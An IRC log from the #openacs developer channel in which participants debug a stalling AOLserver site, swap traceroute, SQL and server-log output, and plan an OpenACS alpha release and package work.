on Apache with DNS and Mail is going fine. 13:30:08 heh 13:30:09 mine too 13:30:53 chump has joined #openacs 13:31:01 Yeah. wb chump 13:31:09 BTW, chump is on that machine. 13:31:30 Psychephylax: the chumplog is searchable here: http://dave.deepskydesign.com/search 13:31:35 ah...that explains why he goes back and forth 13:32:01 yeah if your server is alive =) 13:32:20 shagster has joined #openacs 13:32:22 No thats on my machine here. Its on cable and so far is safe. 13:32:35 markd2 has joined #openacs 13:32:44 Hi markd2 13:33:02 * Psychephylax jabs a Spork into Mark.... 13:33:07 markd2 has changed the topic to: Welcome to #openacs - the OpenACS lounge. http://openacs.org 13:34:12 for markd2: http://dave.deepskydesign.com/search/search?q=markd2&t=Search 13:36:01 help! help! I've been sporked! 13:36:15 rofl 13:36:26 Dave has a problem with his site 13:36:36 it's being eaten by the evil Nimbda worms 13:36:42 davb: sweet 13:36:47 thanks 13:36:54 irc's the only place I go by markd2 13:37:11 I on the other hand go everywhere by the name of Psychephylax ;) 13:37:17 Not anymore, at least I can't tell, I think i screwed it up myself now :) 13:38:20 heh 13:38:34 well at least the init.tcl is not loading. 13:38:35 I keep making myself mixed music cds but I always lose them so I make more 13:39:58 chump has quit 13:41:06 heh! 13:41:45 which question was it? 13:42:39 Ok. I have no clue. Maybe my eithernet card does suck. 13:43:14 what's happening? 13:43:52 Well when you try to connect to the site, it starts to load a page, then it stalls. It seems to get stuck on the requests for images and the css. 13:44:03 Also when I try to SSH in it takes a really long time. 13:44:14 So I killed the AOLservers. 13:44:28 this is thedesignexperience.com? 13:44:39 .org, but yeah. Its down right this secpnd... 13:44:55 how close are you to that box? 13:44:58 (e.g. just friends, etc) 13:45:04 7 miles :) 13:45:08 no car :( 13:45:15 how's the traceroute? 13:45:22 I've seen behavior like that on Bad Net Days, 13:45:22 * davb has no idea... 13:45:37 so once it's up, I can try downloading and see if I have the same experience 13:46:00 Well now I think I am crazy too. Because I checked the access logs and saw the .exe stuff in there. Now the log rolled and I can't find those requests... :( 13:46:09 ok. It has been doing it since yesterday. 13:46:31 http://www.thedesignexerience.org 13:46:39 It gets about 4k transerferred then stalls. 13:46:51 so I hit ESC and I get all the text but nothing else. 13:47:09 oops. all the images load too, just the CSS doesn't load. weird. 13:47:59 heh 13:48:12 that's probably because something off-site is slow or down 13:48:23 I get that all the time with ICQ and it's stupid status buttons on people 13:48:26 's pages 13:48:27 the traceroute from here isn't good 13:49:05 I did it, how do I interpret it? 20 hops I guess.... 13:49:13 chump has joined #openacs 13:49:48 the first two columns are whatever machine the packet goes through 13:49:52 Ok. 13:50:06 traceroute sends out three packets for each stage, and the numbers are the round-trip times to that particular machine 13:50:17 stuff with stars means the packet never came back 13:50:52 18 alb-1-h210.logical.net (204.97.132.21) 32.408 ms 68.179 ms 33.325 ms 13:50:52 19 * * * 13:50:52 20 ip-204-97-175-99.dsl.logical.net (204.97.175.99) 64.111 ms * 61.823 m 13:51:10 yeah 13:51:12 20 is my server. 18 is the ISP... maybe 19 is the modem? 13:51:23 could be 13:51:31 maybe the modem went nutzoid and needs to rebooted 13:51:49 it might not return the ICMP (?) protocol packets too 13:52:07 Maybe. Anyway I have another box right next to it that is running perfectly. 13:52:42 vinod has joined #openacs 13:52:52 Hi vinod! 13:52:56 hey davb! 13:53:11 davb has changed the topic to: Welcome to Troubleshooting davbs netork problem 13:53:37 uhoh - networking is a black art 13:53:40 where's markd2? 13:53:57 I rebooted the box and that did not help. 13:54:18 hey vinod 13:54:25 hey Psychephylax! 13:54:27 Vinod, you see my question on the boards? 13:54:49 no... been working the past couple days - trying to get caught up today 13:54:52 vinod: http://dave.deepskydesign.com/search/search?q=vinod&t=Search 13:55:32 davb: cool! is that openfts? 13:55:33 i have no clue why but my ns_exec_plsql is bugging out wit ha parental key constraint violation 13:55:44 Hi Everybody! 13:55:45 hey Vinod 13:55:53 hey docwolf 13:56:14 hey docwolf, markd2! 13:56:14 hey Psychephylax 13:56:17 hey chump! 13:56:21 hi logg! 13:56:21 hey chump 13:56:24 hey vinod! 13:56:24 hey loggy! 13:56:24 er, loggy 13:56:30 heh 13:56:30 * Psychephylax gives loggy a hug 13:56:33 vinod yes. 13:56:47 lol 13:57:09 davb: cool - looks like google, too - i like! 13:57:14 I have a fantastic example of why java is not appropriate for web use. 13:57:24 heh, that is the default template :) 13:57:41 vinod will appreciate 13:57:42 Spork has joined #openacs 13:57:46 Hey guys! 13:57:50 davb: nice 13:58:04 Hey Spork 13:58:09 hello =) 13:58:18 docwolf: "java is no good for web use because i don't know it yet" :-) 13:58:21 http://www.wml.com -- this is an example of weblogic at its worst. 13:58:21 A: http://www.wml.com from docwolf 13:58:36 * Psychephylax jabs a Spork at mark 13:58:36 * Spork jabs a Psychephylax at mark 13:58:47 hehehehe 13:59:12 looks like the multiple personality disorder is spreading 13:59:12 i should probably go take a shower before i head to school 13:59:23 you definetly should you dirty pig 13:59:32 Whatcha talking about willis? 13:59:43 * markd2 visits the drug sample center 14:00:24 Astiphylax has joined #openacs 14:00:28 docwolf: a friend of a friend pointed me to that site and said that i should build something like that (few months ago) 14:00:31 oh look...the party started without me 14:00:37 docwolf: i said, only in my nightmares 14:01:27 you guys are boring =) 14:01:54 Astiphylax has quit 14:02:36 * davb orders a new intel network card from newegg,com... 14:03:20 3Com is bettah :) 14:03:29 heh, ask rbm :) 14:03:49 about? 14:03:56 I don't really care. I just want the thing to work! 14:04:01 lol 14:04:07 he likes intel, and does not prefer 3COM. 14:04:27 I put a file init.tcl in /usr/local/aoslerver/servers/servername/tcl 14:04:39 It does not seem to be loading... 14:04:57 * Spork departs 14:05:00 Do I have to put it someplace else? I want it to run before the OpenACS stuff? 14:05:06 I have to go stab the shower for a while 14:06:24 you may need to have a library= setting in the .ini file for it to be found there 14:06:29 but it's been awhile... 14:06:50 I think you are correct. 14:07:13 ns_section ns/server/${server}/tcl 14:07:14 ns_param Library /web/${server}/tcl 14:07:15 THat is just the default location for the private tcl library. 14:08:14 argh! 14:08:21 I can't figure this out. 14:09:04 chump has quit 14:09:15 the Library setting is a directory where the server loads all of the *.tcl files on startup 14:09:29 at least in 2.3.3, that logic is also in tcl files (in $NS_HOME/modules/tcl) 14:09:41 right. mine is /web/server/tcl 14:10:07 I am not going to worry about it, its just my crappy sites and the chump. 14:10:20 Maybe I will take this opportunity to upgrade to OpenACS 4 14:12:48 chump has joined #openacs 14:15:48 chump has quit 14:15:53 ack 14:20:00 chump has joined #openacs 14:21:20 Time to head to school 14:26:02 chump has quit 14:36:36 vinod: wml.com looks so _easy_ 14:37:00 and they have executed so badly, it's almost not to be believed. 14:37:08 chump has joined #openacs 14:37:13 argh! 14:38:01 Ok. I am looking at the server access log. I am gettign a hit to a page that was previously views, so it has a 304 status code, but the brwoser stalls and never finishes loading the page... it doesn't load any of the images or CSS 14:38:29 and the request just hangs there... 14:39:17 It won't serve another request, at least it doesn't log it... 14:39:33 AOLserver is still stuck trying to serve the first page. 14:44:28 accesing the IP address and port to bypass nsvhr doesn't help. 14:44:46 chump has quit 14:48:00 docwolf: i actually haven't looked at it in a long while. 14:48:16 docwolf: oh - i see what you mean. just tried to register 14:48:43 rror 14:48:43 RegisterCommand: Transaction: '1004383096064_47' rolled back due to EJB exception: java.sql.SQLException: ORA-01401: inserted value too large for column at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:114) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:542) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1311) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteFetch(TTC7Protocol.java:738 14:48:58 and it goes on like that for about 30 lines 14:49:02 heh 14:49:14 damn those EJB exceptions!! 14:49:32 markd2: don't you miss those? 14:49:57 and of course, now the back button doesn't work 14:50:01 more than life itself 14:50:04 * markd2 coughs 14:50:27 haha 14:51:31 oh, but there is this helpful message (light light blue on white) just before you submit your registration 14:51:37 If you receive an error message, please call Member Services toll free at 1-877-WML-0093 for assistance in updating your account and completing your registration. 14:51:57 you should call it up, and only whisper 14:53:08 lol 14:53:10 chump has joined #openacs 14:54:14 docwolf: were you actually able to register? 14:55:49 til has joined #openacs 14:56:11 chump has quit 14:56:24 docwolf is all powerful 14:56:36 able to register on sites with EJB exceptions 14:56:43 able to leap venture capitalists in a single bound! 14:57:32 docwolf shall now be known as superdoc! 14:57:59 actually, i think i might be able to leap a venture capitalist in a single bound 15:00:56 stop that 15:01:03 you're the PERFORMer now, not a superdoc 15:01:13 and we all know your secret identity 15:01:19 haha 15:01:22 ok, ok - i was getting a little heady there 15:01:47 vinod: I actually did register 15:01:49 but.... 15:01:59 I got the exceptions too... 15:02:39 when i tried to log in again, it said that I already registered. (???) I had it email me my password -- it game me a new username _AND_ password _AND_ it screwed up where i went to school 15:03:02 ouch 15:03:03 but they got my med id#, so obviously some human actually checked the data 15:03:38 this site pisses me off to no end, 1) because i'm cheap and need CME credits and 2) because I _know_ they spent multi-millions to build it. 15:04:11 right 15:04:58 actually, it looks like jerry della famina (the advertising magnate) founded the site (!!) I wonder if he knows how bad it is 15:26:19 Spork has quit 15:35:23 docwolf: where else do you go for CME credit? i do some site-maintenance stuff for theanswerpage.com (don't blame me for the site - i do what i'm told :-) ) 15:43:19 moo 15:43:23 morning all 15:44:47 moo-rning rbm 15:46:34 how's it going vinod? 15:48:14 good. worked all night last night, so i'm about to crash for a bit 15:48:31 heheh. 15:48:34 how are things wit you? 15:48:46 I remember the nights I spent in the ER and hospitals in med school 15:48:56 I loved the ER 15:49:22 vinod: same old. getting to ready to leave to class pretty soon 15:49:26 yeah, er was fun, but too stressful for me. i do urgent care now, which is a step down 15:50:10 yeah. very stressful 15:57:22 * rbm leaves to class 16:02:54 vinod: i'm back. 16:03:16 vinod: looks like you are unconscious :-) 16:04:17 docwolf: almost, not quite :-) 16:05:13 * markd2 wonders how docwolf could tell 16:05:29 markd2: i was snoring pretty loudly 16:05:33 ah 16:05:41 hazmat has joined #openacs 16:05:58 haha 16:06:08 anyway, i'm scrambling to do some CME 16:06:19 i want to do most of it online, but.... 16:06:24 the human touch is always nice. 16:06:35 and besides, i deserve 3-4 days in a fancy hotel :-) 16:06:53 true - i've always wanted to go to a conference - any good ones coming up? 16:07:10 depends on what you're into. 16:07:17 i'm about to sign up for a management course 16:07:19 in florida... 16:07:20 fancy hotel, warm climate 16:07:26 ritz-carleton 16:07:30 naples 16:07:33 (florida) 16:07:42 31 credits, 4 days.. all about business 16:07:48 fills my allotment for 2 years. 16:08:13 hmmm... i've been told i need to get more 'biz-savvy' 16:08:20 i'm on the fence about whether or not to do it. It's a bit of $$$, but the networking opportunity is great. 16:08:54 is it healthcare management or general management? 16:09:06 it's run by the american college of physician executives 16:09:12 let me find the page 16:09:33 (btw, i'm a member of that org. It's a total networking/resume padding situation 16:10:06 executive! very impressive ;-) 16:10:32 haha 16:10:33 http://www.acpe.org/acb/showdetl.cfm?&DID=15&Product_ID=96&CATID=3 16:10:44 it ain't cheap, but it takes care of all the requirements... 16:10:50 and the people should be interesting. 16:13:07 highly recommended, if you're looking to do something unusual. 16:13:36 so if i go in with 'zero' business knowledge, will i be overwhelmed? 16:13:52 no -- this is the "ground level" seminar 16:14:18 actually i think that this seminar 16:14:27 is actually good towards credit for a bogus degree 16:14:33 "masters of medical management" 16:14:58 haha - that's almost like the Masters of the Universe designation markd2 was gonna give me 16:15:25 haha 16:15:43 BY THE POWER OF NUMBSKULL!!!! 16:15:46 anyway, it looks pretty cool. Certainly better than some bizzaro, esoteric course 16:15:54 i'm actually free that week, but the price tag might be too steep. i'll need to think about it 16:16:17 cool 16:16:18 might be fun 16:16:23 (the hotel rocks ;-) ) 16:16:42 does the fee include accomodations? 16:16:48 tragically, no. 16:16:54 i think the ritz is like $140/night 16:16:59 but i think they feed you 16:17:00 fwiw 16:17:05 ahh - not bad. 16:17:17 140 bucks might get you a closet here in bahstan 16:17:26 haha.. even now? 16:17:34 hotels everywhere are falling apart. 16:17:59 haven't checked around recently... i've noticed that apt rents are starting to come down, slowly 16:18:17 til_ has joined #openacs 16:18:17 til has quit 16:18:29 til_ has quit 16:18:47 yeah.. even here in Boca it's the same way 16:18:57 and we're usually pretty recession-proof, being a resort town and all. 16:19:07 til_ has joined #openacs 16:21:02 In august, hotel rates were still pretty steep 16:22:42 mama mia 16:22:43 http://www.ritzcarlton.com/html_prop/resort.asp?Property_ID=12&PageNo=9 16:22:59 how are we supposed to _learn_ anything in that kind of an environment? 16:24:32 if you'd rather, you're welcome to come out to the farm here in western PA and help Backhoe Bill with his cows 16:24:44 haha 16:24:45 k2pts has joined #openacs 16:25:05 docwolf is evil, tempting me like this 16:25:21 :-) 16:25:41 if you come, i'll fill you in on my latest scheme for world domination 16:25:42 that's only $140/night? wow! 16:25:56 markd: you have to attend a dorky conference to get that rate 16:26:08 bummer 16:26:10 markd2 is pretty dorky - he could come too 16:26:40 o u c h 16:27:13 vinod: where else do you do CME? cheaply, i mean? 16:27:44 most web CME really, really sucks. 16:28:04 maybe I can declare myself to be a dorky conference 16:28:08 and get good rates everywhere 16:28:13 i've done a few on medscape, but they don't offer too much. i signed up for the nejm CME test which is 50 credits for $109, but it's not til march 2002 16:28:24 lol 16:29:09 ugh. i need credits before january. medscape isn't too hot. 16:29:34 this wml.com looked good (in theory...) they had some heavy-hitters giving lectures 16:29:41 but, since i can't register... 16:31:09 it's ridiculous. we should just send that ad-magnate guy a proposal to do his site on openacs for like $100,000. 16:31:30 i seriously thought about it. 16:31:54 it could be done by friday ;-) 16:31:59 honestly, these dudes have the nerve to take out full-pages in JAMA, and they come up with _that_? 16:32:33 what is that site really? user registration + streaming real video. 16:32:57 not exactly mind-blowing. 16:33:41 i'm ashamed to admit i left a pretty nasty letter to their support staff. 16:33:42 right. and you wonder how many people have tried to register and failed (2 for 2 in this room) 16:34:07 (i left the typical cranky doctor F-U "don't waste my time" letter .. haha) 16:34:29 send them a bill for your time 16:34:49 markd: i'll send them a bill for the dorky conference that i'll have to attend b/c of their poor programming) 16:34:57 lol 16:35:02 :-/ 16:35:20 nobody wants to answer my questions 16:35:24 question rather 16:40:44 Psychephylax: what does "select * from acs_object_types where upper(object_type)='SNMP_INCIDENT';" return? 16:40:59 let me find out even though I am not working today 16:41:07 neither am i 16:42:41 * markd2 is working, but just barely 16:43:41 heh 16:43:50 ok, here's the output formatted to my best Oracle abilities 16:43:54 OBJECT_TYPE SUPERTYPE A PRETTY_NAME 16:43:54 -------------------- -------------------- - -------------------- 16:43:54 PRETTY_PLURAL TABLE_NAME 16:43:54 -------------------- ------------------------------ 16:43:54 ID_COLUMN PACKAGE_NAME 16:43:55 ------------------------------ ------------------------------ 16:43:57 NAME_METHOD TYPE_EXTENSION_TABLE D 16:43:59 -------------------- ------------------------------ - 16:44:01 snmp_incident acs_object f SNMP Incident 16:44:03 SNMP Incidents snmp_incidents 16:44:05 incident_id snmp_incident 16:44:07 f 16:44:33 vinod I borrowed your reserve code as an example...so I think you might be the best person to help me =) 16:48:02 k2pts has left #openacs 16:50:47 try: 16:50:52 declare v_id integer; begin v_id := acs_object.new(object_type => 'adsa'); end; 16:51:03 sorry 16:51:04 is this going to break stuff? :) 16:51:15 replace 'adsa' with 'snmp_incident' 16:51:38 nope, you're gonna type rollback afterwards. :-) 16:52:27 alright 19:39:17 loggy has joined #openacs 19:39:17 topic is: Welcome to Troubleshooting davbs netork problem 19:39:17 Users on #openacs: loggy john k2pts talli abbaJ til_ hazmat shagster Psychephylax davb rbm blueseed AaronSw 19:39:17 This channel is logged: http://www.blogspace.com/openacs/chatlogs/ and blogged: http://www.thedesignexperience.org/openacs/ircblog 19:39:20 right/ 19:40:35 wb loggy! 19:40:47 :-) 19:43:25 .google 19:48:41 Looks like intel network card support is already compiled into my kernel :) 20:15:33 docwolf has joined #openacs 20:19:37 shagster has quit 20:25:50 john, hazmat: how's the testing of the workflow package going? 20:26:30 umm... its not at the moment. 20:36:57 donb has joined #openacs 20:37:28 Oh-oh, there's a venture vulture in the house! What's up, Adam? 20:37:50 donb: don't you take pictures of those? 20:38:13 hi Don 20:39:22 hi don 20:39:35 Hello don. 20:40:04 echo... echo... 20:42:08 ola has joined #openacs 20:42:17 hi ola 20:42:19 I was just off answering e-mail from Ben, they're starting their UI improvements to file-storage ... 20:42:37 hey everybody! 20:43:30 Talli - have you heard about the Wasatch Brewing Company's latest beer (they're a brewer in Utah): Polygamy Porter, a swipe at one of the more contentious issues in the state ... 20:43:44 whoa... 20:43:47 ola: did i show you: http://dave.deepskydesign.com/search/search?q=ola&t=Search 20:43:49 my kind of booze. 20:44:15 a porter *and* a patriarchical institution? all in a bottle? 20:44:18 i'm in love 20:44:22 They have billboards: "Why have only one?" and "bring a six-pack home for your wives!" 20:44:43 The elders of the church are not amused ... 20:45:52 hey Dave, that's awesome! 20:46:08 that's ok - i'm amused :) 20:46:25 Dave - that's from static pages ??? 20:46:45 davb: I just tried to install static-pages but got an error. 20:47:25 donb: yes, I indexed all the chumpbots output. 20:47:39 ola: what was the error? I will fix it! 20:47:49 Way cool! Search is cool ... 20:47:51 I haven;t reinstalled from CVS since I made the changes. 20:47:59 here it is: 20:48:03 couldn't open "/web/infogettable/packages/static-pages/tcl/static-pages-sc-procs-postgresql.xql": no such file or directory 20:48:14 hmmm. duh. 20:48:17 Someone forgot a cvs add ... :) 20:48:19 I never cvs added the files :) 20:48:21 davb: the search contracts are not in the cvs (that's what I was trying to tell you earlier) 20:48:31 yes same silly mistake 20:48:35 Everyone, now - all at once! 20:51:13 donb: I think I am addicted to this IRC channel. I haven't used IRC for years and now can't do without it -- I don't see the wsdl/nssoap happening if I continue like this. I think you should close it down. 20:51:35 k2pts: I will help on nssoap etc... 20:51:37 I've had similar thoughts ... nothing ever gets done now that we have IRC chat ... :) 20:51:56 really alot of debugging gets done :) 20:52:02 lol 20:52:23 Yeah, sure, people put on a show whenever I join ... 20:53:20 ok, i added the missing files. 20:53:37 davb: :) 20:53:50 ok. lemme try. 20:54:05 So I'm thinking of rolling an alpha2 on Monday ... originally I was thinking about a beta but so much has changed (bug fixes - I'm cleaning up a bunch of CR binary file handling in places like general-comments and file-storage), the new acs-workflow, maybe etp for Oracle if Jon gets done, lots of bug fixes ... 20:54:28 Right. 20:54:34 sounds good to me 20:55:24 Don: I think that keyword stuff should be ready by then. It's mostly functional already. 20:55:34 OK ... I think we'll be able to move to beta pretty quickly. I haven't had time to look at hooking up InterMedia to the new search package yet. Dave - that's excellent! 20:55:57 yes! long live Dave! 20:56:21 I'll need stuff checked in Sunday if I'm to roll a tarball on Monday ... 20:57:25 I must test static-pages on Oracle, any volunteers? If not I'll fire it up later. 20:57:26 sunday is good (acs-workflow-4.3 should be fully ready by then -- btw, found two testers for the pgsql version john and hazmat) 20:57:47 I'm riping out all the package-specific code that dumps CR binary data back to the user and replacing the code with calls to a CR utility that knows about PG/Oracle and db/filesystem issues ... 20:57:53 (ripping out) ... 20:57:58 "testers": figure of speech (not official testers but still good enough) 20:58:09 I'd offer but I'm swamped already ... 20:58:36 np, I can do it, oracle is already installed. 20:58:40 anyone volunteers for the oracle version of acs-workflow-4.3? 20:58:53 Official or not it would be good if they'd e-mail Simom with their results so he can track stuff... 20:59:10 If I have a chance I will look at it. 20:59:19 davb, sounds good. should I send the tarball now or when I am done? (I think it is ready for oracle testing) 20:59:28 don: should the keyword stuff go in its own package? 20:59:41 I think so ... 21:00:12 k2pts: you can send it to me now. 21:00:26 donb: Ok. me too. 21:00:33 davb: on its way. still can't see the contracts under sql/postgresql 21:00:51 hmmm. I did an add and it said they were checked in... 21:00:51 We're going to want to build a framework for KM-related stuff based on service contract eventually so might as well break out this first attempt ... 21:01:19 Right. So far I haven't looked at hooking it up to SC. 21:01:48 oh, you are indexing manually? 21:02:07 This is just to manage keywords. No searching... 21:02:12 so far. 21:02:14 For this first go-around that's OK, I think ... we'll want to put serious thought into the right way to structure stuff ... he's talking about his keyword package, Neophytos ... 21:02:17 right, sorry. 21:02:42 k2pts: they weren't there, but they really are now. 21:03:09 (static-pages-sc-create.sql) 21:03:20 * davb needs more CVS practice. 21:03:36 davb: how do you do that asterisk thing? 21:03:52 its /me whatever you want to say 21:04:09 * k2pts thanx 21:04:37 * donb like this? 21:06:00 davb: statics-pages (CVS) looks great now 21:06:29 jerryasher has joined #openacs 21:06:36 hi jerry 21:06:46 Hi. 21:06:57 davb, your problem is that you need a "w" 21:07:02 k2pts: only 10 trys. 21:07:09 :) 21:07:13 jerryasher: ? where 21:07:19 Or maybe you need a "d", I can't be sure. 21:07:35 davb: I had my problems with CVS too. 21:07:45 Topic is 'Welcome to Troubleshooting davbs netork problem ' 21:08:07 davb has changed the topic to: OpenACS | Free Web Toolkit | http://openacs.org 21:08:22 Anybody know much about tagging releases in a CVS tree? 21:10:19 Dave, I have a tcl proc now, that given "items", spits out RSS 0.91 or RSS 1.00. 21:10:35 And the blogs can now spit out either, AND will ping weblogs when they are updated. 21:10:37 http://www.theashergroup.com/bboard/blog?topic_id=4&as_of_julian_date=2452213&comments_p=f 21:10:44 jerryasher: great. 21:11:03 http://cvsbook.red-bean.com/cvsbook.html 21:11:07 I'm going to bundle that up and release it later today. 21:11:51 Don, I have tagged releases, but I am so far from being an expert, or confident, I am just staying silent. 21:12:17 http://www.arsdigita.com/asj/version-control/ 21:13:30 Yeah, I know about the doc, do you really want me to experiment on the OpenACS4 tree, though? :) 21:14:00 that would be fun :) 21:14:06 donb: I've tagged the 3.x tree 21:14:07 (I was referring to the aD doc) 21:14:20 You could: post a poll with the CVS commands you propose trying, and see what the poll results are :) 21:14:24 Now I have to remember how I did it, but IIRC it's just cvs tag. 21:14:26 lol 21:14:44 www.refcards.com has a great CVS reference card 21:14:54 jerry's idea sounds good to me 21:15:04 * davb gets out his CVS refcard and tapes it to the monitor 21:17:11 Yeah, polling sounds good ... I'll look at the tags Roberto choose for his beta etc, we should probably settle on a standard way to denote stuff. The PG group just finally decided on a standard way of denoting alpha, beta etc in the tree then promptly failed to follow it :) 21:17:17 or you could just dump cvs, subversion.tigris.org 21:17:35 vinod has joined #openacs 21:17:42 hey vinod 21:18:10 hey k2pts! 21:18:14 hmm.. /pvt/home could use an sc-contract for registering additional panels to the workplace? thoughts? 21:18:32 I don't know if they're doing anything with ical, I e-mailed them my code from ACES. I may just drop it in soon. My implementation was incomplete as ACES didn't have timezone information available to it and you need that for repeating events ... (I found a suitable kludge that fooled Outlook, though) 21:19:22 hazmat: I am waiting for the new portals package 21:19:25 The new portal package (OF) is service-contract based and dotLRN will include a workplace-like page that you should be able to customize ... 21:19:47 donb could you post your ical code to file-storage, i and i think others would find it useful... 21:20:36 It would be almost as easy to drop it in :) Bug me if I don't get it done or in file storage by Monday ... 21:20:46 next thing on my todo list after the workflow package is an object-display contract for the community-member.tcl page 21:21:13 i'm going to work on a webmail prototype next week me thinks. 21:21:36 * k2pts hazmat you are my hero! 21:21:39 Did you solve the RP issue? It would be more attractive if it would integrate ... 21:22:02 * k2pts Don too :) 21:22:13 donb: yes, i'm not sure if you checked the bboard lately, but i have rp integration and it can use ats ! 21:22:47 k2pts says that Don is the most active member the past few weeks 21:23:13 s/lately/today 21:23:15 No, I didn't see that on the bboard. Last I heard you'd solved ats but not rp ... 21:23:37 That's cool, Kapil ... 21:23:43 rp was nesc. for ats 21:24:08 because ats is uplevel/var hell 21:24:23 hazmat: are you going to use qmail,other??? 21:24:51 * k2pts completely ignorant about webmail stuff 21:25:03 Connect with OF - they've done work before with qmail to stuff mail into OpenACS and they need to do more for dotLRN ... 21:25:06 no, i think the original webmail design is kinda of broken, a webmail interface should talk directly to the imap server ala imp (horde.org) 21:26:05 as for sending mail, it probably would make sense to use qmail, but i'll probably just smtp directly to a host for the prototype 21:26:11 Does everyone provide imap servers these day? 21:27:00 mostly... pop introduces alot of additional burdens, the lack of preparsed structure, locked mailboxes, searching, etc. 21:27:21 if people thinks its required though they should speak up. 21:27:48 smtp direct is fine, I think ... for instance Henry Minsky worked on a Japanese site that sends a *lot* of mail and they found it necessary to split it off onto a separate mail server. So the option, at least, smtp out should probably be an option ... 21:28:11 boy that's mangled language ... sorry! 21:28:30 no, that sounds good to me Don :) 21:28:43 if it needs to be enterprise scalable, the mail should get dropped of in a directory to be injected directly into qmail/postfix queues. 21:28:59 don when can we expect to see some docs or something about dotlrn? 21:29:14 hell, i would settle just for seeing it 21:30:31 davb: what files get added with a filesystem scan? only my ".html" files got added and not a ".css" file I had in there. 21:30:49 ola. its hardcorded as just html. 21:31:08 It probably should be a parameters in the future. 21:31:58 Ugh ... it should certainly be parameterized! 21:32:24 ok 21:32:35 Talli - not sure. Ben's put up some internal design docs for my enjoyment, since I'll be working on an events package for Sloan. 21:32:50 But nothing's really ready for public consumption yet ... 21:32:55 heh. I will look into it. shouldn't be too tricky, just a list of extensions to scan. 21:32:59 will the alpha code be released? 21:33:23 I think so, Talli ... it's not in my hands, though, it's really up to Sloan. 21:33:44 does sloan have the copyright on the code? 21:33:58 I don't know but it will be GPL'd ... 21:34:21 They let aD have the copyright on the ACES stuff AFAIK 21:34:27 donb, do you know when the alpha code is going to be released (approximately) 21:35:08 Mid-november was the original schedule but Sept. 11th may've messed that up. I know OF missed virtually two weeks of work afterwards ... 21:37:06 do you know if they are doing any work on mounting trees of nodes to the sitemap? 21:38:26 dotLRN requires that but I don't know if they'll be working on a general solution to mount "package suites" to the sitemap. In other words, every class instance requires a suite of packages ... 21:38:44 Feel free to ping Ben on the issue ... 21:39:23 I've only been following dotLRN to the extent I need to for the package furfly will be providing Sloan... 21:39:46 Existing OpenACS stuff keeps me busy enough! 21:39:56 abbaJ has quit 21:40:16 one final question: On the http://dotlrn.mit.edu page they say that .LRN is compatible with both Oracle 21:40:17 (proprietary, expensive) and PostGRES (opensource, free) databases." Do you know if they are also porting stuff to pgsql? 21:41:40 OF has to deliver a working Oracle version in time for next (spring) term. Ben's committed to supporting PG but it's not clear that they'll get done in parallel due to the need to get it running for Oracle at Sloan. 21:42:04 ok Don thanks 21:42:08 Of course, I'm also committed to supporting it under PG it's gonna get done! :) 21:42:22 while executing 21:42:22 "ns_pg_bind 0or1row nsdb0 { 21:42:22 select static_page__grant_permission(:item_id,acs__magic_object_id('the_public'), 21:42:22 'general_comments_create', :recur..." 21:44:12 Well ... I'm going to get back to work on CR binary content issues ... have a good day, folks ... 21:44:20 donb has quit 21:46:21 need to go off too guys. 21:46:22 cheers 21:46:35 k2pts has left #openacs 21:53:25 abbaJ has joined #openacs 22:03:00 select object_id, date, event 22:03:00 from search_observer_queue 22:03:00 order by date asc;' 22:03:00 [31/Oct/2001:00:08:04][6271.2051][-sched-] Notice: dbinit: sql(localhost::infogettable): ' 22:03:00 select object_id, date, event 22:03:02 from search_observer_queue 22:03:04 order by date asc 22:03:06 ' 22:03:08 [31/Oct/2001:00:08:04][6271.2051][-sched-] Notice: Done running scheduled proc search_indexer. 22:03:10 [31/Oct/2001:00:08:34][6271.2051][-sched-] Notice: Running scheduled proc search_indexer... 22:03:12 [31/Oct/2001:00:08:34][6271.2051][-sched-] Warning: APM: FtsEngineDriver does not exist 22:03:14 [31/Oct/2001:00:08:34][6271.2051][-sched-] Notice: Querying ' 22:03:16 select object_id, date, event 22:03:18 from search_observer_queue 22:03:20 order by date asc;' 22:03:22 [31/Oct/2001:00:08:34][6271.2051][-sched-] Notice: dbinit: sql(localhost::infogettable): ' 22:03:24 select object_id, date, event 22:03:26 from search_observer_queue 22:03:28 order by date asc 22:03:30 ' 22:03:32 [31/Oct/2001:00:08:34][6271.2051][-sched-] Notice: Done running scheduled proc search_indexer. 22:08:09 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Notice: Querying ' 22:08:09 select count(*) 22:08:09 from dual 22:08:09 where acs_permission__permission_p('2390', '2237', 'read') = 22:08:10 't';' 22:08:12 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Notice: dbinit: sql(localhost::infogettable): ' 22:08:14 select count(*) 22:08:16 from dual 22:08:18 where acs_permission__permission_p('2390', '2237', 'read') = 22:08:20 't' 22:08:22 ' 22:08:24 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Notice: ns_getform using encoding iso8859-1 for charset iso-8859-1 22:08:27 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Notice: Querying ' 22:08:29 select filename from static_pages where static_page_id = '2399';' 22:08:31 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Notice: dbinit: sql(localhost::infogettable): ' 22:08:33 select filename from static_pages where static_page_id = '2399' 22:08:35 ' 22:08:37 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Warning: APM: bgcolor does not exist[31/Oct/2001:00:11:26][6271.21509][-conn8-] Warning: APM: textcolor does not exist 22:08:40 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Warning: APM: EnabledP does not exist 22:08:42 [31/Oct/2001:00:11:26][6271.21509][-conn8-] Warning: propagating abortion from /web/infogettable/packages/static-pages/www/page-visit.tcl (status 500): 'Error in filename') 22:08:45 [31/Oct/2001:00:11:34][6271.2051][-sched-] Notice: Running scheduled proc search_indexer... 22:08:47 [31/Oct/2001:00:11:34][6271.2051][-sched-] Warning: APM: FtsEngineDriver does not exist 22:08:49 [31/Oct/2001:00:11:34][6271.2051][-sched-] Notice: Querying ' 22:08:52 select object_id, date, event 22:08:53 from search_observer_queue 22:12:06 order by date asc;' 22:12:14 talli has quit 22:12:56 ola has quit 22:12:56 abbaJ has quit 22:13:19 ola has joined #openacs 22:13:19 abbaJ has joined #openacs 22:13:31 * AaronSw disconnects 22:16:38 shagster has joined #openacs 22:27:51 davb_ has joined #OpenACS 22:27:56 Psychephylax has quit 22:27:56 